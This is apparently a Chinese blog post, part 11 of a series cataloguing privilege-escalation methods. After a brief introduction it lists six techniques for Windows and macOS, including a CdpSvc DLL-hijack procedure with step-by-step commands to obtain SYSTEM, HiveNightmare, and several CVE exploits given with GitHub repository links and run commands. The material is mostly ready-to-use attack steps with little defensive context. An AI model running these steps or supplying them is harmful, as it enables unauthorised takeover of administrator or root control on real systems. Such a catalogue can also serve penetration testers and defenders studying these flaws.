百种提权及手段一览系列第11集

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了86种提权方法,本期我们继续整理了6种热门提权方式,本期分享完后,我们一共就分享了92热门提权的方法,而离100种方法也快结束,再来一期,打完收工,请大家继续查收哟,:

1.CdpSvc Service

域:No

Local Admin: Yes

操作系统:Windows

类型:Hijack

方法:

使用 acltest.ps1 查找可写系统路径(例如 C:\python27)

C:\CdpSvcLPE> powershell -ep bypass "...\acltest.ps1"

将 cdpsgshims.dll复制到 C:\python27

创建 C:\temp 文件夹并将 impersonate.bin 复制到 C:\temp

C:\CdpSvcLPE> mkdir C:\temp

C:\CdpSvcLPE> copy impersonate.bin C:\temp

重新启动(或以管理员身份停止/启动 CDPSvc)

cmd 将提示 nt authority\system。

2.HiveNightmare

域:Yes

Local Admin: Yes

操作系统:Windows

类型: 0/1 Exploit

方法:

HiveNightmare.exe 200

3.CVE-2021-30655

域:No

Local Admin: Yes

操作系统:Windows

类型: 0/1 Exploit

方法:

https://github.com/thehappydinoa/rootOS

Python rootOS.py

4.CVE-2019-8526

域:No

Local Admin: Yes

操作系统:Mac

类型: 0/1 Exploit

方法:

https://github.com/amanszpapaya/MacPer

Python main.py

5.CVE-2020-9771

域:No

Local Admin: Yes

操作系统:Mac

类型: 0/1 Exploit

方法:

https://github.com/amanszpapaya/MacPer

Python main.py

6.CVE-2021-3156

域:No

Local Admin: Yes

操作系统:Mac

类型: 0/1 Exploit

方法:

https://github.com/amanszpapaya/MacPer

Python main.py

相关推荐
灯琰13 小时前
STM32F4+W5500 移植与开发常见问题
网络
SLD_Allen3 小时前
Garak:NVIDIA开源的LLM安全“体检”工具
安全·ai
qyr67894 小时前
全球新能源汽车电机驱动器市场深度调研报告
大数据·网络·人工智能·自动化·汽车
Hiyajo pray5 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
初晴融雪-快雪时晴5 小时前
网络硬件全景梳理:从光纤到手机,一张网是如何连接的?
网络·智能手机·智能路由器
辣椒思密达6 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
huainingning6 小时前
交换机通过ftp下载文件或者传输文件到ftp服务器
运维·服务器·网络
2401_854151557 小时前
嵌入式 Bootloader 与 OTA 固件升级深度解析——从 Flash 分区到安全回滚
开发语言·stm32·单片机·嵌入式硬件·安全·php
花生了什么事o8 小时前
DNS:把域名翻译成 IP 的层级查询机制
网络·网络协议·tcp/ip
satadriver8 小时前
手工加载API函数
安全